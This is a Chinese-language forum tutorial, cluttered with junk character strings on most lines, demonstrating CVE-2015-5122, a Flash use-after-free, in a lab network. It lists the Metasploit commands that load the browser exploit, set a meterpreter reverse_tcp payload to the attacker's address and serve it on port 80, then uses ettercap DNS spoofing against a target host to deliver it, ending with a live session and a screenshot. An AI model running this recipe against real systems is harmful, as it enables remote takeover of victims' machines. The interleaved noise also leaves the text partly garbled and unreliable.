2 j! d4 V* b5 Q8 C 二、cve2015-5122漏洞实例演示虚拟机
4 ~3 o+ ~$ _( l" [" M7 |4 k/ w5 T: z
% y1 U B8 f* a3 U& `2 w
n: F5 f, t7 e! l# k 关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图:
0 j9 }% Z$ W0 u" T: g+ V. l q" h* G6 c6 E* N
$ y* V' w/ [1 [' w
search cve-2015-5122如图: , x% Y, b% g _$ ?1 H* N; _
+ |# G# X$ q7 I3 d3 o7 G2 [, l" A6 ]& G6 s: z
0 W. H# w8 C9 P+ ?3 S/ S , {" L% [' F" [) \ C
/ [% N7 g# a! i2 r 下面我们敲如下命令: . H0 r% t9 l+ q5 F" N
6 K0 r9 `0 a3 p' {2 R4 {/ t0 g
3 o3 p. a! K) G use exploit/multi/browser/adobe_flash_opaque_background_uaf * `+ o7 F* I( ~2 E3 X' ]# I, P
4 Q$ N' c: r3 m6 `
! P9 S% u! Y+ O0 e f7 L, n8 j* ~2 y set PAYLOAD windows/meterpreter/reverse_tcp ( Y* J2 w5 M, C" K, r0 n, D5 P
# V( y" i n( N4 X
1 i Q" b8 r; I! j2 k9 M1 s- t set LHOST 192.168.0.109 2 W' ?9 x0 c: M/ B5 j5 t y
0 x3 g1 j* b# Z' S
1 b( S4 ]# B" D7 D" T
set URIPATH / /*根目录*/ . i* ]- s b6 ~7 X2 t( i! F
0 u6 ~# F" K. _4 x8 J. e
v; ~9 f# V7 L& `' A
set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址
, Q- [0 K' I6 D( a) Y
1 o) Z6 Q! c/ d- K
$ S; T# {; K, E/ Z& J set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用
! b3 P& }! p$ \/ M& _/ U
* S9 |0 L& z9 I; K; [" `0 P; F9 u0 Z/ U- E- e
然后show options如图: 8 K$ f9 T( m, h# b% T9 t( A6 A
: [" V$ E' v7 I% K
# u6 a; e3 \8 b# c
$ f, p+ P" A* E$ k3 ~1 n4 q
: q; c- T. N7 K$ _' @5 K4 G* G# u
0 ~. W9 G# Y" R8 k$ Y# o2 K M2 D 一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图:
; \- H1 ~6 Z" l* I( m) p' P, M' X / \. e) Z# r6 \6 ]: S4 E. ?5 T
' n. |2 ^8 L9 J! F, | y$ X1 B) x
然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115
0 i7 `: X. B# [8 H+ V, q& w& t 4 L' t) b& x4 C# s
# B G% T! I# L) H1 N" o2 ]4 @
Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf
' u# V0 r0 V' ]3 D" y: V- C% Y1 F
' u, T) e4 k6 e5 W1 {2 T6 i
+ X$ J7 G1 h4 z, v7 g, C4 ] % w& [& w2 {. g7 j. n7 p/ t p
0 k5 _$ X! N0 ~. }# k. N% c$ Q4 {* E4 B8 H2 }) V- K
成功了,这时候我们断开ettercap,如图: 7 y S+ w( b3 e. I
. f; r4 f6 q1 [$ x
" {: [7 J! h& m/ l! h/ u
/ N3 d. c5 R( U; |
" [' i& C; F1 j3 U& y% O! a6 [# v' }3 U$ l4 K
Screenshot如图:
9 o5 K8 @! z- w) r
d0 r' c: q; {! j
# Q* O8 H- I) s" ` 3 \0 Y' U0 C1 n4 v( P+ V
: x; p2 b+ ]. E0 Y
$ V8 Y* F3 Y+ R; O: S' h" X
, c, u& B1 }% A" @& y$ z# D) j1 B. E
|